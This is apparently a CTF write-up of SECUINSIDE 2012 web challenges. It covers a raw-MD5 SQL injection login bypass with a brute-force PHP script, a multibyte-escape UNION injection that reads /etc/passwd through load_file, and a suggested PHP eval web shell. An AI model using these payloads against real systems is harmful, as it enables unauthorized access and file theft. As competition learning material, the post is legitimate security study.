Hello, I participated (as Tasteless) at SECUINSIDE 2012 CTF prequals and really liked it because many webchalls were available. Other guys from team were mostly missing but I suceded in finishing 5 of 6 challs. Here are writeups;


cliph: login bypass using MD5 in raw format

$mpw=md5("$_POST[ip]",true);
$q=mysql_fetch_array(mysql_query("select * from member where id='$_POST[id]' and ip='$mpw'"));

in PHP, md5($string,true) will return raw format of MD5 which can have some characters like ‘,“,= etc Now, shortest usable injection is MD5 with ‘=’ somewhere in there. here is small PHP script to get those:

<?php
for($i=1;$i<=100000000;$i++)
if(strpos(md5($i,true),"'='")>-1)echo $i."\n";
?>

it gave me few number, I used 2998869 login as

id:admin
ip:2998869

making the query

select * from member where id='admin' and ip='¦-'=':ÚTŕÍ,pžÇ˝ß'

Making it true because in MySQL Select ‘a’=‘b’=‘c’ is true. flag was visible when you login’d as admin. It actually required you to have at lest 2147483647 gold, guess admin had that much…


sqlgeek

This is hardest among webchalls. I haven’t really finished it but I was pretty close.

$_GET[view]=mb_convert_encoding($_GET[view],'utf-8','euc-kr');
if(eregi("from|union|select|\(|\)| |\*|/|\t|into",$_GET[view])) exit("Access Denied");
if(strlen($_GET[view])>17) exit("Access Denied");
$q=mysql_fetch_array(mysql_query("select * from challenge5 where ip='$_GET[view]' and (str+dex+lnt+luc)='$_GET[stat]'"));

magic_quotes were ON and I used multibyte character %bf%5c in order to be able to use $_GET[stat] for injection. so,

index.php?view=%bf%5c&stat= or 3=2 union select 1,2,3,4,5,6,7-- -

Now, $_SESSION[read_me]=“/etc/passwd”; tells us to read /etc/passwd so

index.php?view=%bf%5c&stat= or 3=2 union select load_file(0x2f6574632f706173737764),2,3,4,5,6,7-- -

from there I saw ReADDDDDDD______MEEEEEEEEEEEEE.php - and it included your session returning it’s values. Now I didn’t know what to do - I knew I need to get command execution somehow but didn’t know how. After CTF ended, user “hvortex” said I could manipulate $_SESSION[id] due to extract($_GET); which I didn’t see… I guess you could use something like $_SESSION[id]=<?php eval($_GET[cmd]); ?> then include and read flag.  I was wrong, here is whole writeup: Reiners blog

This is one of best webchalls I encountered so far. =)